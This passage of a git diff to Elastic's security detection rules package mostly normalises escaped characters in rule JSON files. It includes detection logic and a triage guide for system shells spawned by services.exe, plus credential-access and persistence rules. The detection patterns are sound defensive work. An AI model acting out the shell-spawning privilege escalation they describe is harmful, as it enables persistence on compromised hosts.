diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml index 7f2d4db037e..46ea2aa5948 100644 --- a/packages/security_detection_engine/changelog.yml +++ b/packages/security_detection_engine/changelog.yml @@ -1,5 +1,10 @@ # newer versions go on top # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production +- version: 8.12.1-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/8714 - version: 8.11.4 changes: - description: Release security rules update diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_102.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_102.json index 2298729561c..d922e06ae36 100644 --- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_102.json +++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_103.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_103.json index 6ac478874af..e47afea8894 100644 --- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_103.json +++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_103.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_104.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_104.json index f78e4205b3b..240ca5fd19d 100644 --- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_104.json +++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_105.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_105.json index e269ccf5f95..12f30051a79 100644 --- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_105.json +++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_106.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_106.json index 0c011bbd916..24decf1db1f 100644 --- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_106.json +++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_106.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_207.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_207.json index 831f6d88925..9a13c9844fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_207.json +++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_207.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_105.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_105.json index ab80214cd6e..68c72af004d 100644 --- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_105.json @@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_106.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_106.json index 887b4c8e37f..3cc907dba4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_106.json @@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_107.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_107.json index 1e1a787224c..e4471b5cef7 100644 --- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_107.json @@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_108.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_108.json index 7e461f17a35..bde304020fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_108.json @@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_109.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_109.json index eea64d069c8..12bfd95aec0 100644 --- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_109.json +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_109.json @@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_110.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_110.json index 55ba0d2cb7d..205251681d7 100644 --- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_110.json +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_110.json @@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_104.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_104.json index 197b450cab6..98a31a6892f 100644 --- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_104.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "0022d47d-39c7-4f69-a232-4fe9dc7a3acd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_105.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_105.json index 03dc5a4ca6d..ba54d8bd188 100644 --- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_106.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_106.json index 38cc2f533f5..896494546bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", "related_integrations": [ { @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_107.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_107.json index 06b98274fa9..7bc2cab29a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by 